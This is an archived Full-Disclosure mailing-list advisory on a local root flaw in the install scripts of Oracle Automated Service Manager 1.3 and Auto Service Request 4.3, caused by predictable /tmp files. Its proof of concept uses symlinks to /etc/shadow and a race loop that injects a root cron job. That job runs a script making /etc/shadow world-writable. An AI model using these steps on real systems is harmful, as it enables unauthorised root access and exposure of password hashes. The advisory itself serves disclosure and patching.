[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Oracle Automated Service Manager 1.3 & Auto Service Request 4.3 local root during install
- To: submissions@xxxxxxxxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Oracle Automated Service Manager 1.3 & Auto Service Request 4.3 local root during install
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Fri, 01 Feb 2013 04:22:02 +0000 (GMT)
<html><body><div><h2>Oracle Automated Service Manager 1.3 local root during
install
</h2>
<p>Larry W. Cashdollar<br>
1/29/2013<br>
@_larry0<br>
</p>
<hr size="2" width="100%">
<p><br>
SUNWsasm-1.3.1-20110815093723
</p>
<p><a
href="https://updates.oracle.com/Orion/Services/download?type=readme&aru=15864534";>https://updates.oracle.com/Orion/Services/download?type=readme&aru=15864534</a>
</p>
<p>From the README: <br>
"Oracle Automated Service Manager 1.3.1 </p>
<p>Oracle Automated Service Manager is the service management
container for Auto Service Request and Secure File Transport. It
provides platform services (such as logging, data transport and
persistence) to business services that are deployed to it."
</p>
<p>Possible issues with files in /tmp. </p>
<p>root@dev-unix-sec01:~/test# strings
SUNWswasr-4.3.1-20130117131218.rpm |grep tmp<br>
</p>
<p>##Read the contents of crontab into a tmp file
/usr/bin/crontab -l > /tmp/crontab_edit
echo "0" > /tmp/tmpVariable<br>
grep "/opt/SUNWswasr/bin/update_rules.sh" /tmp/crontab_edit |
</p>
<p> echo "1" > /tmp/tmpVariable<br>
grep "0" /tmp/tmpVariable > /dev/null
</p>
<pre> echo >> /tmp/crontab_edit
echo "##Cronjob entry for ASR Auto Rules Update" >>
/tmp/crontab_edit
echo "$min $hour * * * /opt/SUNWswasr/bin/update_rules.sh" >>
/tmp/crontab_edit
</pre>
<p>ASR_STAT_REP=`/bin/grep -c 'bin/asr report' /tmp/crontab_edit`
</p>
<p> sed "/asr report/d" /tmp/crontab_edit > /tmp/asrtab1.??? mv
/tmp/asrtab1.??? /tmp/crontab_edit sed "/ASR Status Report/d"
/tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.???
/tmp/crontab_edit
ASR_HEARTBEAT=`/bin/grep -c 'bin/asr heartbeat' /tmp/crontab_edit`
</p>
<p> sed "/asr heartbeat/d" /tmp/crontab_edit > /tmp/asrtab1.???
mv /tmp/asrtab1.??? /tmp/crontab_edit sed "/ASR Heartbeat/d"
/tmp/crontab_edit > /tmp/asrtab1.??? mv /tmp/asrtab1.???
/tmp/crontab_edit
/usr/bin/crontab /tmp/crontab_edit<br>
## Finally remove the tmp file<br>
rm -f /tmp/tmpVariable<br>
rm -f /tmp/crontab_edit
</p>
<p> tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%SOURCE'`
/usr/bin/crontab -l > /tmp/asrtab.??<br>
UPDATE_RULES=`/bin/grep -c 'bin/update_rules.sh' /tmp/asrtab.??`
</p>
<p> sed "/update_rules.sh/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv
/tmp/asrtab.??? /tmp/asrtab.??<br>
sed "/ASR Auto Rules/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv
/tmp/asrtab.??? /tmp/asrtab.??<br>
ASR_STAT_HB=`/bin/grep -c 'bin/asr' /tmp/asrtab.??`
</p>
<p> sed "/asr report/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv
/tmp/asrtab.??? /tmp/asrtab.??<br>
sed "/ASR Status Report/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv
/tmp/asrtab.??? /tmp/asrtab.??<br>
sed "/asr heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv
/tmp/asrtab.??? /tmp/asrtab.??<br>
sed "/ASR Heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.??? mv
/tmp/asrtab.??? /tmp/asrtab.??<br>
/usr/bin/crontab /tmp/asrtab.??<br>
rm /tmp/asrtab.??<br>
]!tmpD<br>
root@dev-unix-sec01:~/test# </p>
<h4>First try, File overwriting vulnerability
</h4>
<p> $ ln -s /etc/shadow /tmp/mytab-tmp.??<br>
$ ln -s /etc/shadow /tmp/mytab.??
</p>
<p>[root@oracle-lnx-lab02 ~]# rpm -Uvh
SUNWsasm-1.3.1-20110815093723.rpm <br>
Preparing... <br>
########################################### [100%]
</p>
<p>Copyright 2008,2011 Oracle and/or its affiliates. All rights
reserved.
</p>
<p>License and Terms of Use for this software are described at <a
href="https://support.oracle.com/";>https://support.oracle.com/</a>
(see Terms o
f Use)
</p>
<p> 1:SUNWsasm ########################################### [100%]
</p>
<p>Authentication service cannot retrieve authentication info
You (root) are not allowed to access to (/usr/bin/crontab) because
of pam configuration.
</p>
<p>Authentication service cannot retrieve authentication info
You (root) are not allowed to access to (/usr/bin/crontab) because
of pam configuration. </p>
<p>[root@oracle-lnx-lab02 ~]# cat /etc/shadow
<br>
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance >
/dev/null 2>&1
</p>
<p>Ok, lets try to inject a cronjob and get root:
</p>
<p>Malicious user does:
</p>
<p>[meanie@oracle-lnx-lab02 ~]$ while (true) ;do echo "* * * * *
/tmp/rootme" > /tmp/mytab.??; done
</p>
<p>[root@oracle-lnx-lab02 ~]# rpm -Uvh
SUNWsasm-1.3.1-20110815093723.rpm <br>
Preparing... <br>
########################################### [100%]
</p>
<p>Copyright 2008,2011 Oracle and/or its affiliates. All rights
reserved.
</p>
<p>License and Terms of Use for this software are described at <a
href="https://support.oracle.com/";>https://support.oracle.com/</a>
(see Terms o
f Use)
</p>
<p> 1:SUNWsasm ##########################################<strong>
[100%]
<br>
[root@oracle-lnx-lab02 ~]</strong> crontab -l<br>
* * * * * /tmp/rootme<br>
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance >
/dev/null 2>&1
</p>
<p>/tmp/rootme is:
</p>
<p>#!/bin/sh
</p>
<p>chmod 666 /etc/shadow
</p>
<p>after a minute:
</p>
<pre>[root@oracle-lnx-lab02 ~]<strong> </strong>ls -l /etc/shadow
<br>-rw-rw-rw- 1 root root 744 Jan 30 21:02 /etc/shadow
<br>[root@oracle-lnx-lab02 ~]<strong><br></strong></pre>
<h4><strong>Faulty Code:<br>
</strong></h4>
<pre><strong> 319 /usr/bin/crontab -l >
/tmp/mytab.??</strong></pre>
<pre><strong> 320 if [ $(/bin/grep -c 'sasm'
/tmp/mytab.??) -eq 0 ];then</strong></pre>
<pre><strong> 321 echo
"0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null
2>&1" >> /tmp/mytab.??</strong></pre>
<pre><strong> 322
/usr/bin/crontab /tmp/mytab.??</strong></pre>
<pre><strong> 323 fi</strong></pre>
<pre><strong> 324 </strong></pre>
<pre><strong> 325 rm /tmp/mytab.??</strong></pre>
<pre><strong></strong></pre>
<p><strong><br>
</strong> </p>
<h2>SUNWswasr RPM post install /tmp race condition</h2>
<hr size="2" width="100%">
<p><br>
</p>
<p>From the documentation:
</p>
<p>"Auto Service Request (ASR) is a secure, scalable,
customer-installable software feature of warranty and Oracle
Support Services that provides auto-case generation when common
hardware component faults occur. ASR is designed to enable faster
problem resolution by eliminating the need to initiate contact
with Oracle Support Services for common hardware component
failures, reducing both the number of phone calls needed and
overall phone time required. ASR also simplifies support
operations by using electronic diagnostic data. Easily installed
and deployed, ASR is completely controlled by you, the customer,
to ensure security. ASR is applicable only for component faults.
Not all component failures are covered, though the most common
components (such as disk, fan, and power supplies) are covered."
</p>
<p>The post-install script for SUNWswasr RPM handles files in /tmp
insecurely. </p>
<p>I suspect a race condition exists where these two files can be
used to either clobber root owned files or inject malicious
cronjobs into roots cron:
</p>
<p>/tmp/tmpVariable<br>
/tmp/crontab_edit
</p>
<p>[root@oracle-lnx-lab02 ~]# rpm -Uvh
SUNWswasr-4.3.1-20130117131218.rpm Preparing...
########################################### [100%]
</p>
<p>Copyright [2008,2012], Oracle and/or its affiliates. All rights
reserved.
</p>
<p>License and Terms of Use for this software are described at <a
href="https://support.oracle.com/";>https://support.oracle.com/</a>
(see Legal Notices and Terms of Use).
</p>
<p> 1:SUNWswasr ########################################### [100%]
<br>
Directory /var/opt/SUNWsasm/configuration/caseinfo created.
<br>
Directory /var/opt/SUNWsasm/configuration/supportfile created.
<br>
ASR Manager Auto Update functionality has been enabled by default.
<br>
Please ensure that ASR manager is registered with ASR backend to
get the software updates.
<br>
Installation of SUNWswasr was successful.<br>
</p>
<p>Lets fireup fsnoop[1] and take a look:<br>
</p>
<pre>[C] -rw-r--r-- 1 root root 0 Thu Jan 31 14:30:12 2013
/tmp/crontab_edit
[U] -rw-r--r-- 1 root root 100 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[C] -rw-r--r-- 1 root root 0 Thu Jan 31 14:30:12 2013 /tmp/tmpVariable
[U] -rw-r--r-- 1 root root 2 Thu Jan 31 14:30:12 2013 /tmp/tmpVariable
[U] -rw-r--r-- 1 root root 101 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 143 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[U] -rw-r--r-- 1 root root 188 Thu Jan 31 14:30:12 2013 /tmp/crontab_edit
[D] F /tmp/tmpVariable
[D] F /tmp/crontab_edit<br><br></pre>
Those look exploitable lets pick one. <br>
<p>I was able to inject my own cronjob in as root with the following
simple PoC:
</p>
<p>$ while (true) ;do echo "* * * * * /tmp/rootme" >>
/tmp/crontab_edit; done
</p>
<p>[root@oracle-lnx-lab02 ~]# crontab -l<br>
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance >
/dev/null 2>&1
</p>
* * * * * /tmp/rootme <--- prepended and contains our malicious
shell/binary, see exploit above.
<p>##Cronjob entry for ASR Auto Rules Update
<br>
7 3 * * * /opt/SUNWswasr/bin/update_rules.sh
</p>
<p>The uninstall script is just as sloppy:
</p>
<p>[C] F /tmp/asrtab.??<br>
[U] F /tmp/asrtab.??<br>
[C] F /tmp/asrtab.???<br>
[U] F /tmp/asrtab.???<br>
[C] F /tmp/asrtab.???<br>
[U] F /tmp/asrtab.???<br>
[D] F /tmp/asrtab.??
</p>
<p>did they mean to use $$ for process Pid?<br>
</p>
<h2>References:</h2>
<hr size="2" width="100%">
<p><br>
</p>
<p>[1] fsnoop - /tmp directory file watching utility by vl4dz.
http://vladz.devzero.fr/fsnoop.php</p><p>http://docs.oracle.com/cd/E18476_01/doc.220/e18478/asr.htm#BABHIHFF<br>
</p>
http://vapid.dhs.org/advisories/Oracle_ASR_4.3.1-root-install.html</div></body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/